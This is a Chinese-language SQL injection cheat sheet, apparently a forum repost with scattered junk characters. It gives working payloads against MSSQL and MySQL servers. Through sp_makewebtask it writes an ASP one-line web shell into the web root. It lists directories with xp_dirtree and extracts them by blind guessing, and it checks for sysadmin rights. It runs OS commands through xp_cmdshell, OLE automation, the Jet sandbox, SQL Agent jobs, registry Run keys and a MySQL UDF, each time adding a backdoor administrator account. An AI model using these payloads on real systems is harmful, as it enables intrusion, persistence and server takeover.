MSSQL语句导出一句话木马
. L8 P. Q q: I1 s4 {! X首先确定网站的WEB路径( J) B& J& d6 e1 n. `3 W
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马0 X0 j2 |/ r6 ? F2 R; R! k8 W
6 l3 Z, [' v, T {% \" R& U
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
/ U: ^; }" U) v c//将一句话木马插入表中
" b/ x0 R7 q0 g3 O3 [- K/ _ P( k4 g5 P9 ^; d. u
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- ) [% L$ z% W5 \* M- m5 O; v* V9 u
//导出一个ASP文件. W9 E* q7 b" N4 q7 a7 b
! @0 Y7 b; {3 N Q3 m+ X" n
$ Q% ]/ g! \- d- s% K4 }4 P关于MSSQL列目录$ n: S- \% h1 v, t$ l
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表# d7 m+ m9 |( g! o2 O) Y
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
( L$ _) |2 A: _/ V. {: H
7 j1 J- G! W" c. k; t: V% m, k, sand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录7 V- M& J$ u& Y# H4 W5 ^. a
' x2 ^( }" {9 O$ r; y
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
' E1 ~8 V0 ]8 T3 ~+ }4 f7 x3 V0 l4 \* m& f* E: u0 M2 @/ t
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符; a' F) z9 P; @0 p3 u3 f
4 f$ {- V$ Q: W8 l
/ T7 }0 m5 W- o数据库版本和权限查看$ _9 d t$ n$ ~% z" Y. ~! s! o
and 1=(select @@VERSION) //查看详细的数据库信息.
3 a" ~2 S8 c! ^# {and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA- ^" C& P2 [ B& X8 |) z; Z8 p
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
: |5 a- o7 d6 [! [% t$ q8 p% Y/ e! L8 @% E5 b3 u
" d; Q5 s3 O- n& D) t
1.利用xp_cmdshell执行命令
1 w+ T* Z; K6 K1 Qexec master..xp_cmdshell 'net user rfire 123456 /add'
/ i% ]0 g8 e( P2 I: q+ Rexec master..xp_cmdshell 'net localgroup administrators rfire /add'
$ T' [: R! |7 P% \7 j2 ]- \4 K6 y5 |) d
2 H& M9 \* y1 U$ o恢复xp_cmdshell存储过程( P9 M5 l$ l `! @9 w( W" h
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'9 B9 N8 F. L' S
, |/ d. h# s' e9 n7 [* T
* L2 ?( L1 M+ Z1 N4 h: ^2.利用SP_OAcreate和SP_OAMETHOD执行命令( h! x- D0 u. R, \* H
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
5 h9 \* K; C: y: [DECLARE @shell INT //建立一个@shell实体( T% F, v. E3 [/ T
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
; K% f: }3 X: W! s& W. H7 wEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例- }# ]3 c1 ~" T% c, }8 c! n9 y
' i3 I" a) s2 Z- r. v5 E2 m/ z
5 e# d& s( V1 R/ _2 E' `, F3.利用沙盒模式
9 {$ p( r) P' k( B- a先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
! B7 W" Z5 Y: i: | m1 M开启沙盒模式:) A' _5 e+ {7 E; |& D% T
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',05 }& Q k. X$ [5 x, D' A
; [9 i q0 A& f7 t执行命令:
1 } W1 m& \3 }( i/ USelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');0 Z* Q5 Y8 T8 D V0 V% z
; U+ L) e% g3 R( B% h4 q4 d. z( u/ X1 ^7 o
4.利用SQL代理执行命令/ T: @: i$ p+ l) ]
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务4 B7 W" A% j- p* p: y* }
4 w# t% V# D1 {; L执行命令:) @# O' R X2 y, d1 j
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错5 K, o ~( a/ Z4 `' m9 [
exec sp_add_job 'x'+ R; m e/ B' v4 y
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
8 I3 Y% H [: k% ~exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业# w; ^1 b# _5 q3 j5 \
4 e% J4 p+ d' V& ~
! f, l0 a: l6 i5 j( z5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
3 Y/ P6 | Y# |/ EEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
7 Z: @. P) |9 a. {
0 r4 Y4 z2 |& R( S
' \3 ?8 U+ n) m' ^ x6.MYSQL的命令执行$ ^7 V% k5 s1 H; f! N+ B
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
5 g7 w, v' W2 W; H5 t$ ?首先要在su.php下导出c:\windows\udf.dll5 a0 {. y& C6 q' ?& [9 w3 r
导出后执行创建自定义函数命令:
5 ^8 k$ S. w* I" g( K6 y& h# KCreate Function cmdshell returns string soname 'udf.dll'' K! P; s# S! v2 [2 @" ?' O
执行命令
6 f& [( J/ g) d0 L3 g6 wselect cmdshell('net user rfire 123456 /add')% ~+ x% e" I9 x/ u2 O# P+ r! H
执行后删除函数 drop function cmdshell R1 N/ `% _# n2 {7 u
|